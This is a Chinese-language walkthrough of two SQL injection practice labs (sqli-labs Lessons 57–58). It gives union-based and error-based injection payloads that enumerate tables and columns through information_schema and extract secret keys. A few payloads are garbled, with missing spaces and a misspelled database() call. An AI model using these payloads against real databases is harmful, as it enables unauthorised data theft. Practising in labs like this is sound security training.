Lesson-57
该题为双引号get型注入,利用方式包括联合查询、布尔盲注、时间盲注
id=1'
目标SQL语句如下:
if($_POST['reset']):
setcookie('challenge',' ',time()-3600000);
else:
if($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire =time()+60*60*24*30;
$hash =data($table,$col);
setcookie("challenge", $hash, $expire);
if($_GET['id']):
$id=$_GET['id'];
$id='"'.$id.'"';
next_tryy()>=($times+1)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
iftrue:
输出查询信息;
else:
输出报错;
注意:该题与Lesson54的利用方式相同,只不过拼接方式由单引号变成了双引号,错误次数由10次变为14次
使用联合查询判断注入点
id=1"--+
判断字段数
id=1" order by 3--+ //返回正确
id=1"orderby4--+ //返回异常
由此可判断字段数为4,通过 union select 查看回显位置
id=-1" union select 1,2,3--+
查询表名
id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
查询列名
id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='mup8sgqrlo'--+
查询关键信息
id=-1" union select 1,2,group_concat(secret_EGMD) from mup8sgqrlo--+
成功拿到 key 值:UFLHEB2MKHMJWM97fXAajgWB
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-58
该题为单引号get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'
目标SQL语句如下:
if($_POST['reset']):
setcookie('challenge',' ',time()-3600000);
else:
if($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire =time()+60*60*24*30;
$hash =data($table,$col);
setcookie("challenge", $hash, $expire);
if($_GET['id']):
$id=$_GET['id'];
next_tryy()>=($times+1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
iftrue:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());
注意:该题只输出$unames和$pass数组,而$pass数组是$uname数组的逆序,因此使用联合查询无法返回我们需要的数据信息。但可以使用报错注入获取数据
使用报错注入判断注入点
id=1'--+
查询基础信息
id=1' and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1'and(selectcount(*)from information_schema.tablesgroupby concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1' and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+
查询表名
id=1' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
查询列名
id=1' and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='me487dxhor' limit 2,1),0x7e,floor(rand(0)*2)))--+
查询关键信息
id=1' and (select count(*) from information_schema.tables group by concat((select secret_NMS4 from me487dxhor limit 0,1),0x7e,floor(rand(0)*2)))--+
成功拿到 key 值:mx7XGPasBPeRQKfCQJ7LEwt1
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
